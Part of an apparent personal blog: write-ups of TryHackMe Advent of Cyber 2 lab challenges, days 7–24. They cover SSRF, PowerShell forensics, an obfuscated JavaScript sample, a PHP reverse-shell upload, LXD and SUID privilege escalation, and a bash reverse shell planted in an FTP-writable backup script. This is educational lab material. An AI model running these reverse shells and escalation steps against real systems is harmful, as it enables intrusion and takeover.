poggie.de

security. code. parenting. learning. games.

TryHackMe – Advent of Cyber 2 Day 19 – 24 – BlueTeam, Web [Writeup]

As with the first, second and third part I have split the post to not get it too long.

Day 19 – The Naughty or Nice List

As in the previous days, we start by deploying the Attackbox and Challenge. Once all had some time to load, we pull up the site in a browser.

We have a Naughty&Nice list search and a Admin login. Let’s put something into the search, bar in my case.

It tells us bar is on the nice list. In the url bar, we notice where the search query leads us to:

http://10.10.154.156/?proxy=http%3A%2F%2Flist.hohoho%3A8080%2Fsearch.php%3Fname%3Dbar

This is url encoded. Using a url decoder (for example cyberchef) we can make it read nicer:

http://10.10.154.156/?proxy=http://list.hohoho:8080/search.php?name=bar

It looks like it is requesting something from a different server for the search. This means we most likely can request other services too. It might be a Server Side Request Forgery (SSRF) vulnerability, since we can make the server make requests.

Let#s try a accessing the same server by using http://10.10.154.156/?proxy=http://localhost as proxy parameter.

Looks like there is a policy in place that prevents that. Other external urls like google.com will give the same error.

It seems like the domain has to start with list.hohoho.

The challenge hint right on to that we need to use localtest.me to bypass the hostname filter with is set to localhost. So let’s use list.hohoho.localtest.me as proxy.

Ohh, this gives us a response:

This reveals the password and we can use that together with the username Santa to log into the admin panel.

There we can delete the naughty list, which will display the flag.

Day 20 – PowershELlF to the rescue

As before we deploy both attack box and the challenge.

First we ssh into the challenge box ssh -l mceager 10.10.104.58, accpet the fingerprint and enter thge supplied password.

We end up in a windows cmd prompt. Let’s first upgrade to powershell

With cd .\Documents\ we change into the Documents folder. Tab completion will help us. ls -Hidden reveals the folders hidden content. With cat we can print the content of e1fone.txt.

Then we do the same loop with the Desktop. cd .. and cd .\Desktop\. Another ls -Hidden shown a new folder, we cd .\elf2wo\ into it. There are no hidden files in here so we use ls without the hidden flag to show the files. Using cat again to display it’s content.

For the third task we are supposed to search the windows folder, so we cd C:\Windows\System32\ into it. There are a lot of files and we need to filter them down with ls -Hidden -Directory -Filter "*3*"

After changing into the folder, we wil notice it has 2 hidden files. The first one, where we are supposed to count words is pretty long. Too long for a manual count. We can use Measure-Object for that. We cat the file and pipe it to it. cat .\1.txt | Measure-Object -Word

To get specific words from the file, we can use powershells ability to access objects as arrays: (cat .\1.txt)[551, 6991]

For the final question we will use the select string commandlet. cat .\2.txt | Select-String "redryder" and yes, I had to use the hint to realize it had to be in there as one word and lower case.

Day 21 – Time for some ELForensics

We deploy the machines and follow the guide in the challenge to connect via RDP.

After opening powershell, we change the directory to Document s. With ls we can check for files, then cat will print the files content.

Advent of Cyber 2 - Day 21 - 01.jpg

Get-FileHash -Algorithm MD5 .\deebee.exe Gives us the MD5 hash of that file.

Luckily we have a strings tool on the machine so we can inspect the strings in that mysterious binary to find something interesting with c:\Tools\strings64.exe -accepteula .\deebee.exe, for example a flag.

Right below the flag we find something else:

Set-Content -Path .\lists.exe -value $(Get-Content $(Get-Command C:\Users\littlehelper\Documents\db.exe).Path -ReadCount 0 -Encoding Byte) -Encoding Byte -Stream hidedb

This hints that something is hidden in the ADS streams. Let’s display the streams of the exe

PS C:\Users\littlehelper\Documents> Get-Item -Path .\deebee.exe -stream *


PSPath        : Microsoft.PowerShell.Core\FileSystem::C:\Users\littlehelper\Documents\deebee.exe::$DATA
PSParentPath  : Microsoft.PowerShell.Core\FileSystem::C:\Users\littlehelper\Documents
PSChildName   : deebee.exe::$DATA
PSDrive       : C
PSProvider    : Microsoft.PowerShell.Core\FileSystem
PSIsContainer : False
FileName      : C:\Users\littlehelper\Documents\deebee.exe
Stream        : :$DATA
Length        : 5632

PSPath        : Microsoft.PowerShell.Core\FileSystem::C:\Users\littlehelper\Documents\deebee.exe:hidedb
PSParentPath  : Microsoft.PowerShell.Core\FileSystem::C:\Users\littlehelper\Documents
PSChildName   : deebee.exe:hidedb
PSDrive       : C
PSProvider    : Microsoft.PowerShell.Core\FileSystem
PSIsContainer : False
FileName      : C:\Users\littlehelper\Documents\deebee.exe
Stream        : hidedb
Length        : 6144

The second stream is the one we are looking for. Using the stream related command in the description and the correct stream we can run the DB connector: wmic process call create $(Resolve-Path .\deebee.exe:hidedb)

It will open another command window with the DB access and a flag.

Day 22 – Elf McEager becomes CyberElf

We start with the usual deploy & RDP connection dance.

For the first task, it looks like the folder is something encoded. Opening that in Cyberchef and pulling over the magic solver, we should get the password. thegrinchwashere. In there we also see the encoding.

We can no open up the password file. The passwords are encoded as well so we put them into cyberchef again. Magic does the trick.

For the final flag we have to look at the recycle bin.

eval(String.fromCharCode(118, 97, 114, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 51, 44, 32, 49, 48, 53, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 52, 54, 44, 32, 49, 48, 51, 44, 32, 49, 48, 53, 44, 32, 49, 49, 54, 44, 32, 49, 48, 52, 44, 32, 49, 49, 55, 44, 32, 57, 56, 44, 32, 52, 54, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 52, 55, 44, 32, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 49, 48, 49, 44, 32, 49, 49, 48, 44, 32, 49, 49, 52, 44, 32, 57, 55, 44, 32, 49, 48, 53, 44, 32, 49, 50, 50, 44, 32, 57, 55, 44, 32, 52, 55, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 52, 57, 44, 32, 52, 57, 44, 32, 49, 48, 48, 44, 32, 53, 49, 44, 32, 53, 48, 44, 32, 52, 57, 44, 32, 53, 48, 44, 32, 53, 50, 44, 32, 53, 50, 44, 32, 57, 57, 44, 32, 53, 50, 44, 32, 49, 48, 48, 44, 32, 53, 52, 44, 32, 53, 52, 44, 32, 53, 53, 44, 32, 53, 50, 44, 32, 53, 50, 44, 32, 53, 52, 44, 32, 49, 48, 48, 44, 32, 57, 56, 44, 32, 49, 48, 50, 44, 32, 49, 48, 48, 44, 32, 53, 55, 44, 32, 57, 55, 44, 32, 53, 49, 44, 32, 53, 48, 44, 32, 53, 55, 44, 32, 53, 54, 44, 32, 57, 55, 44, 32, 53, 54, 44, 32, 53, 54, 44, 32, 57, 56, 44, 32, 53, 54, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125));

That is JavaScript and we can put it into the Web developers console of our web browser

This gives us a github gist url we can visit to get the flag.

Day 23 – The Grinch strikes again!

And once more we deploy and log in with RDP.

There is a ransom note on out desktop. The bitcoin address seems to be encoded in some way. The two == hint that it might be base64. Using a decoder like CyberChef we will get the address.

Looking around in our documents folder we find a lot of files that have been renamed.

Opening up the task Scheduler and looking at the library, we will find a unusually names task and under actions it lists what .exe is run.

In the details of the shadow Copy task, we will find the volume ID.

The Disk Management utility shows that there is a backup partition and we can assign it a drive letter to access it.

We need to set the explorer options to show hidden folders so we can see the hidden one.

Following the instructions opf the final task, we get the last answer.

Day 24 – The Trial Before Christmas

For a final time we deploy the attack box and the challenge.

We don’t know anything about the box so we will run an nmap scan for all ports. This will take very long.

We find port 80 and 65000 open.

We bring up the site on port 65000 in the browser. You can find the title in the tab name or by looking at the source code.

Now it is time to bust out gobuster to do some directory and file brute forcing. Since we waited so long for the nmap, I take chances and use only a small word-list and the php extension.

root@ip-10-10-225-197:~# gobuster dir -u http://10.10.73.143:65000 -x php -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.73.143:65000
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php
[+] Timeout:        10s
===============================================================
2020/12/26 04:48:03 Starting gobuster
===============================================================
/index.php (Status: 200)
/uploads.php (Status: 200)
/assets (Status: 301)
/api (Status: 301)
/grid (Status: 301)
===============================================================
2020/12/26 04:48:22 Finished
===============================================================

Pulling up http://10.10.73.143:65000/uploads.php gets us to a upload functionality. But even if we upload legitimate images it gives us a Invalid File-type Error.

Let’s look at the source code by pulling up the web developer tools and using the debugger. There is a filter.js and it always returns false.

We start burp, set the browsers proxy to it and Edit the intercept exception rule to not include .js anymore. Then we reload the page and forward all requests but drop the request to filter.js .

Now we copy a default php reverse shell cp /usr/share/webshells/php/php-reverse-shell.php ./rs.jpg.php. We include the .jpg in the filename just in case there is a server side file type check in place. This will not fool every check, but very simple ones.

Now we edit the file to match our IP and specify a port. Then we start a netcat listener on that port with nc -lvnp 4444

Then we turn off intercept in burp and upload the file. Next we need to find the folder where it is stored. In our directory scan we found grid. Pulling that up in the browser, we find our uploaded file.

After clicking that, we should have a connection on our listener. First thing to do is to stabilize the shell. There are multiple ways of doing this but we will follow the guide in this challenge.

python3 -c 'import pty;pty.spawn("/bin/bash")'

followed by export TERM=xterm, CTRL+z and stty raw -echo; fg

With our shell stabilized, we can start to look around. whoami returns www-data, a rather common user for the webserver. This means our permissions are most likely restricted to the webserver folders.

Let’s have a look at those with cd /var/www/ and ls. There is our web.txt and we can cat it.

There is another folder, TheGrid. we cd into it and look around. It has an include sub-folder and we can find the DB credential in dbauth.php

Knowing the database credentials we can connect to it with. mysql -utron -p

show databases; Shows us the databases and use tron; let’s us select the one we need.

show tables displays the available tables and SELECT * From users; dumps the user data.

edc621628f6d19a13a00fd683f5e3ff7 looks like a hash. We can put it into a service like crackstation to reveal the password.

After an exit in mysql su flynn and using that password allows us to become flynn on the shell. cd ~ lets us navigate to the home folder, where we can cat user.txt

Now we need to escalate our privileges. ID shows us what groups flynn is in.

flynn@light-cycle:~$ id
uid=1000(flynn) gid=1000(flynn) groups=1000(flynn),109(lxd)

LXD is a container tool similar to docker. Luckily the challenge provides us with a walk-through of how to exploit it.

First we check for available images.

flynn@light-cycle:~$ lxc image list
To start your first container, try: lxc launch ubuntu:18.04

+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |         UPLOAD DATE          |
+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| Alpine | a569b9af4e85 | no     | alpine v3.12 (20201220_03:48) | x86_64 | 3.07MB | Dec 20, 2020 at 3:51am (UTC) |
+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+

Then we initialize the container lxc init Alpine foo -c security.privileged=true and add a device with the root filesystem lxc config device add foo bar disk source=/ path=/mnt/root recursive=true

lxc start foo starts the container and with lxc exec foo /bin/sh we get a shell in it.

cd /mnt/root/root gets us into the root folder where we can cat root.txt

That wraps up the Advent of Cyber 2 and earns us a nice certificate!

TryHackMe – Advent of Cyber 2 Day 14-18 – OSINT, Scripting Reverse, Engineering [Writeup]

As with the first and second part I have split the post to not get it too long.

Day 14 – Where’s Rudolph?

This day I will keep a lot shorter and basically just give some additional hints.

For the first task we go to reddit and open up a random profile of a user. Then we replace the username in the url to IGuidetheClaus2020. Then it only is a matter of clicking on Comments and you have the first url.

Read through the posts, the second gives you the next answer.

Robert is Rudolf’s creator. Googling for rudolf creator we will give you the third answer.

On his reddit comments he speaks about twitter (Q4) and testing his reddit username, we find it is the same. (Q5)

In his tweets he mentions a TV show and that aswers question 6.

For Question 7 we can use googles reverse image search and find out about the city.

Downloading the file and looking at the EXIF data of the image wil give us a location (Q8) and a flag.

Rudolf has posted a email address in his twitter bio. Putting that into https://scylla.sh/api (a search for data breaches) as search term email:rudolphthered@hotmail.com will give us his password.

Using the GPS exif data from his image in google maps, we find that he is staying in the Marriott in Chicago. Street number is in the hotel details.

Day 15 – There’s a Python in my stocking!

The first question of today can all be answered by running the code in the python interpreter True + True and the second one can be answered by reading the day’s description.

bool("False") we can put into the interpreter again and Question 4 is another one for the Description.

For the code analysis we could just put the code into the interpreter and see what comes out. But let’s look at the code more in detail.

x = [1, 2, 3] Creates a Variable names x with the array containing 1, 2 and 3

y = x Because python used pass by reference this creates a variable y that points to the same thing (the array in this case) as x

y.append(6) appends 6 to the array y and x are pointing to.

print(x) prints the array.

Day 16 – Help! Where is Santa?

Since it gives us easier access to the challenge, we are going to use the attack box again. Deploy it and the challenge.

Pulling up the page in the web browser without any ports (meaning on 80), does not work, so we have to find the correct port.

A quick nmap scan should do the trick.

root@ip-10-10-226-56:~# nmap 10.10.244.23

Starting Nmap 7.60 ( https://nmap.org ) at 2020-12-23 03:55 GMT
Nmap scan report for ip-10-10-244-23.eu-west-1.compute.internal (10.10.244.23)
Host is up (0.0026s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE
8000/tcp open  http-alt
MAC Address: 02:7D:17:61:1D:3D (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds

Now we can pull up the site with the browser.

The site suggests finding the link to the API with a python script and you should do that for practice if you haven’t done much with python yet.

But we can also view source and search for api.

Accessing http://10.10.244.23:8000/api/ will give us a JSON response of: {"detail":"Not Found"}. We have to supply the API key. The challenge warns us that the server will block us after a certain amount of wrong attempts.

It also tells us, that the key is between 1 and 100 and odd. Which leaves 50 different keys to try.

Let’s write a python script to go through all potential keys:

# Importing the requests libary that allows us to do html requests
import requests

# We use a for loop to iterate over all potential API keys.
# We use the step size of two becasue of the info that the valid key is odd 
for apikey in range(1,100,2):

    # We make the request and store it in response. to concatonate a string 
    # (the api url ) with a number(the key) we need to convert the number to
    # a string first
    response = requests.get('http://10.10.244.23:8000/api/' + str(apikey) )

    # now we print the text of the response
    print(response.text)

In the console output of that script we will find the answers.

Day 17 – ReverseELFneering

First we deploy both boxes. Once they are up, we ssh into the challenge box with the provided credentials.

I highly recommend that you do the example file1 walk through provided in the challenge to get used to the tools.

We open the challenge file in radare with r2 -d ./challenge1 and start the analysis with aa. This will take a while.

pdf @main shows us the content of the main function of the program.

In there we can already see what value is are stored in local_ch first.

We can use two approaches here. the first is to go through the instructions and logically examine what should be in the variable asked for. But we can also use break points and step through the instructions, then look at the memory. We will use the later approach, even if the first would be faster in a simple program like this.

To find out what value is in eax when imul is called, we can set a break point at that function call with db 0x00400b62, then run the program up until the break point with dc.

Then we step through the instruction and look with px @eax at the memory content of eax.

Stepping one instruction further, we can use px @rbp-0x4 to get the content of local_4h. We know local_4h is at @rbp-0x4 by looking at the top of main, where the variables are defined.

Day 18 – The Bits of Christmas

We start again with deploying the attack box and challenge. After giving it 5 minutes or so to start, follow the guide on how to connect to the windows remote desktop. Eventually you should see the Desktop.

We open up the TBFC_APP with ILSpy and can start browsing through the decompiled code.

Spotting the CrackMe portion, we dig further into that. It looks like this is where the form is handled. We are interested in the main form.

Let’s see what the code is the button will run when clicked:

Looks like there is a password check in there and it references the correct password.

Further down is also the Flag that will be printed out if the correct password is supplied. This already answers the questions, but we can of course also run the program, supply the password and see the flag.

TryHackMe – Advent of Cyber 2 Day 7-13 – Networking [Writeup]

Sine the first post already is getting very long, I am splitting the Writeup up into multiple posts, grouped by topic.

You can already read the web exploitation part.

Day 7 – The Grinch Really Did Steal Christmas

For this challenge we do not need the attack box. We download the pcaps and if we do not already have wireshark installed, we will have to get that too.

For the first task, we open up the first pcap and put ICMP into the filter bar to only see ICMP pakets.

To see only the http get requests, we use the filter again. We filter for the http get mehod with http.request.method == GET.

For the next question we filter for the requested ip and the http GET method with ip.addr == 10.10.67.199 && http.request

Looking through the requests should give us a good hint of what article he was searching for.

Next we open up the second pcap and utilize the filter once more. ftp should filter the requests down enough.

To find the encrypted protocol, we can sort by protocol and scroll through them. That should give a quick find.

For the last task we open up the third pcap. HTTP is a protocol often used for file transfer, so we filter for that.

Then we select the response and go to File->Export Objects->HTTP. In the next dialog we can select the .zip file.

In that zip we will find the wishlist and with it the final answer.

Day 8 – What’s Under the Christmas Tree?

For this day we are back to our beloved attack box. Deploy that and the challenge. While that is loading, spend some time to google for the first question. Wikipedia is a good source for the answer 😉

Now we scan the deployed box with nmap.

nmap 10.10.82.53

Starting Nmap 7.60 ( https://nmap.org ) at 2020-12-13 00:57 GMT
Nmap scan report for ip-10-10-82-53.eu-west-1.compute.internal (10.10.82.53)
Host is up (0.0012s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
80/tcp   open  http
2222/tcp open  EtherNetIP-1
3389/tcp open  ms-wbt-server
MAC Address: 02:A3:D0:DC:D1:2F (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.63 seconds

The challange wants us to experiemtn a bit with the -Pn, -sV and -A flag and we do so. This should help us find the OS of the system, too.

I do like to add a -v for more verbose output to my nmap scans.

nmap -sV -v 10.10.82.53

Starting Nmap 7.60 ( https://nmap.org ) at 2020-12-13 01:01 GMT
NSE: Loaded 42 scripts for scanning.
Initiating ARP Ping Scan at 01:01
Scanning 10.10.82.53 [1 port]
Completed ARP Ping Scan at 01:01, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:01
Completed Parallel DNS resolution of 1 host. at 01:01, 0.00s elapsed
Initiating SYN Stealth Scan at 01:01
Scanning ip-10-10-82-53.eu-west-1.compute.internal (10.10.82.53) [1000 ports]
Discovered open port 3389/tcp on 10.10.82.53
Discovered open port 80/tcp on 10.10.82.53
Discovered open port 2222/tcp on 10.10.82.53
Completed SYN Stealth Scan at 01:01, 1.25s elapsed (1000 total ports)
Initiating Service scan at 01:01
Scanning 3 services on ip-10-10-82-53.eu-west-1.compute.internal (10.10.82.53)
Completed Service scan at 01:02, 6.04s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.82.53.
Initiating NSE at 01:02
Completed NSE at 01:02, 0.01s elapsed
Initiating NSE at 01:02
Completed NSE at 01:02, 0.00s elapsed
Nmap scan report for ip-10-10-82-53.eu-west-1.compute.internal (10.10.82.53)
Host is up (0.0017s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Apache httpd 2.4.29 ((Ubuntu))
2222/tcp open  ssh           OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
3389/tcp open  ms-wbt-server xrdp
MAC Address: 02:A3:D0:DC:D1:2F (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.96 seconds
           Raw packets sent: 1002 (44.072KB) | Rcvd: 1237 (52.535KB)

For the next task, we are supposed to run the http.title scrip. But that scrip already was part of our experiments with -A

This gives us enough information to finish the day. But there are quite a few Easter eggs hidden in this day and you really should take the opportunity to play around a bit with nmap here.

Day 9 – Anyone can be Santa!

Today is all about FTP so let’s get the attack box and the challenge deployed.

First we connect to the server via ftp and have a look. We don’t have credential yet so we go with anonymous. With ls we can list the directories content, just like we do in the terminal.

There is only one folder we can access as anonymous. We use cd to change into it, then ls again to see the content.

There are two files and we can download them to our attack box with get filename. In our local filesystem we open up the shopping list first and answer question 3.

Now it is time to open up the script in an editor.

#!/bin/bash

# Created by ElfMcEager to backup all of Santa's goodies!

# Create backups to include date DD/MM/YYYY
filename="backup_`date +%d`_`date +%m`_`date +%Y`.tar.gz";

# Backup FTP folder and store in elfmceager's home directory
tar -zcvf /home/elfmceager/$filename /opt/ftp

# TO-DO: Automate transfer of backups to backup server

It is a Backup script that absolutely should not be in the public folder. We even have permissions to upload in that folder.

We replace it with

#!/bin/bash
bash -i >& /dev/tcp/10.10.214.41/4444 0>&1

, a simple bash reverse shell, to the script and save it. The IP in there needs to be your attack box IP not the one from the challenge.

Before we upload the modified script, we need to set up a listener for our reverse shell. nc -lvnp 4444 does the trick.

Now we can upload the scrip with put in ftp.

After a minute or two, we should get a connection on our listener.

With cat /root/flag.txt we read our final flag.

Day 10: Don’t be so sElfish

As always we deploy attack box and the challenge. First we run enum4linux with -U to enumerate users.

root@ip-10-10-214-41:~/Desktop/Tools/Miscellaneous# ./enum4linux.pl -U 10.10.180.212
WARNING: polenum.py is not in your path.  Check that package is installed and your PATH is sane.
WARNING: ldapsearch is not in your path.  Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 13 09:41:50 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.180.212
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===================================================== 
|    Enumerating Workgroup/Domain on 10.10.180.212    |
 ===================================================== 
[+] Got domain/workgroup name: TBFC-SMB-01

 ====================================== 
|    Session Check on 10.10.180.212    |
 ====================================== 
[+] Server 10.10.180.212 allows sessions using username '', password ''

 ============================================ 
|    Getting domain SID for 10.10.180.212    |
 ============================================ 
Domain Name: TBFC-SMB-01
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ============================== 
|    Users on 10.10.180.212    |
 ============================== 
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: elfmcskidy    Name:   Desc: 
index: 0x2 RID: 0x3ea acb: 0x00000010 Account: elfmceager    Name: elfmceagerDesc: 
index: 0x3 RID: 0x3e9 acb: 0x00000010 Account: elfmcelferson    Name:   Desc: 

user:[elfmcskidy] rid:[0x3e8]
user:[elfmceager] rid:[0x3ea]
user:[elfmcelferson] rid:[0x3e9]
enum4linux complete on Sun Dec 13 09:41:51 2020

This gives us the users. Now we also enumerate the shares:

root@ip-10-10-214-41:~/Desktop/Tools/Miscellaneous# ./enum4linux.pl -S 10.10.180.212
WARNING: polenum.py is not in your path.  Check that package is installed and your PATH is sane.
WARNING: ldapsearch is not in your path.  Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 13 09:45:10 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.180.212
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===================================================== 
|    Enumerating Workgroup/Domain on 10.10.180.212    |
 ===================================================== 
[+] Got domain/workgroup name: TBFC-SMB-01

 ====================================== 
|    Session Check on 10.10.180.212    |
 ====================================== 
[+] Server 10.10.180.212 allows sessions using username '', password ''

 ============================================ 
|    Getting domain SID for 10.10.180.212    |
 ============================================ 
Domain Name: TBFC-SMB-01
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ========================================== 
|    Share Enumeration on 10.10.180.212    |
 ========================================== 
WARNING: The "syslog" option is deprecated

    Sharename       Type      Comment
    ---------       ----      -------
    tbfc-hr         Disk      tbfc-hr
    tbfc-it         Disk      tbfc-it
    tbfc-santa      Disk      tbfc-santa
    IPC$            IPC       IPC Service (tbfc-smb server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

    Server               Comment
    ---------            -------

    Workgroup            Master
    ---------            -------
    TBFC-SMB-01          TBFC-SMB

[+] Attempting to map shares on 10.10.180.212
//10.10.180.212/tbfc-hr    Mapping: DENIED, Listing: N/A
//10.10.180.212/tbfc-it    Mapping: DENIED, Listing: N/A
//10.10.180.212/tbfc-santa    Mapping: OK, Listing: OK
//10.10.180.212/IPC$    [E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
enum4linux complete on Sun Dec 13 09:45:11 2020

The output shows us that tbfc-santa courld be mapped. Let’s try to log into this share with no password. With dir we list the content and should have all information to finish the tasks.

Day 11 – The Rogue Gnome

We start up the attack box and challenge. While they boot we read the documentation in the challenge and answer the first two questions.

The we SSH into the box with the provided credentials. ssh cmnatic@10.10.154.38. On the first connect, you will have to confirm the servers fingerprint.

With find / -perm -u=s -type f 2>/dev/null we search for binaries that have the SUID bit set. Meaning they can be executed with the permission of a different user.

-bash-4.4$ find / -perm -u=s -type f 2>/dev/null
/bin/umount
/bin/mount
/bin/su
/bin/fusermount
/bin/bash
/bin/ping
/snap/core/10444/bin/mount
/snap/core/10444/bin/ping
/snap/core/10444/bin/ping6
/snap/core/10444/bin/su
/snap/core/10444/bin/umount
/snap/core/10444/usr/bin/chfn
/snap/core/10444/usr/bin/chsh
/snap/core/10444/usr/bin/gpasswd
/snap/core/10444/usr/bin/newgrp
/snap/core/10444/usr/bin/passwd
/snap/core/10444/usr/bin/sudo
/snap/core/10444/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/10444/usr/lib/openssh/ssh-keysign
/snap/core/10444/usr/lib/snapd/snap-confine
/snap/core/10444/usr/sbin/pppd
/snap/core/7270/bin/mount
/snap/core/7270/bin/ping
/snap/core/7270/bin/ping6
/snap/core/7270/bin/su
/snap/core/7270/bin/umount
/snap/core/7270/usr/bin/chfn
/snap/core/7270/usr/bin/chsh
/snap/core/7270/usr/bin/gpasswd
/snap/core/7270/usr/bin/newgrp
/snap/core/7270/usr/bin/passwd
/snap/core/7270/usr/bin/sudo
/snap/core/7270/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7270/usr/lib/openssh/ssh-keysign
/snap/core/7270/usr/lib/snapd/snap-confine
/snap/core/7270/usr/sbin/pppd
/usr/bin/newgidmap
/usr/bin/at
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/newuidmap
/usr/bin/traceroute6.iputils
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine

/bin/bash looks liek a very prmising candidate. Let#s check the permissions.

-bash-4.4$ ls -la /bin/bash 
-rwsr-xr-x 1 root root 1113504 Jun  6  2019 /bin/bash
-bash-4.4$ 

Looks like it can be run as root. We will do just that with bash -p

Now we can cat the flag file.

Day 12: Ready, set, elf.

After deploying the boxes we run a quick nmap scan to get an overview:

root@ip-10-10-214-41:~# nmap -sV -v 10.10.83.199

Starting Nmap 7.60 ( https://nmap.org ) at 2020-12-13 10:24 GMT
NSE: Loaded 42 scripts for scanning.
Initiating ARP Ping Scan at 10:24
Scanning 10.10.83.199 [1 port]
Completed ARP Ping Scan at 10:24, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:24
Completed Parallel DNS resolution of 1 host. at 10:24, 0.00s elapsed
Initiating SYN Stealth Scan at 10:24
Scanning ip-10-10-83-199.eu-west-1.compute.internal (10.10.83.199) [1000 ports]
Discovered open port 8080/tcp on 10.10.83.199
Discovered open port 3389/tcp on 10.10.83.199
Discovered open port 8009/tcp on 10.10.83.199
Increasing send delay for 10.10.83.199 from 0 to 5 due to 11 out of 27 dropped probes since last increase.
Completed SYN Stealth Scan at 10:24, 20.25s elapsed (1000 total ports)
Initiating Service scan at 10:24
Scanning 3 services on ip-10-10-83-199.eu-west-1.compute.internal (10.10.83.199)
Completed Service scan at 10:25, 13.88s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.83.199.
Initiating NSE at 10:25
Completed NSE at 10:25, 0.30s elapsed
Initiating NSE at 10:25
Completed NSE at 10:25, 0.00s elapsed
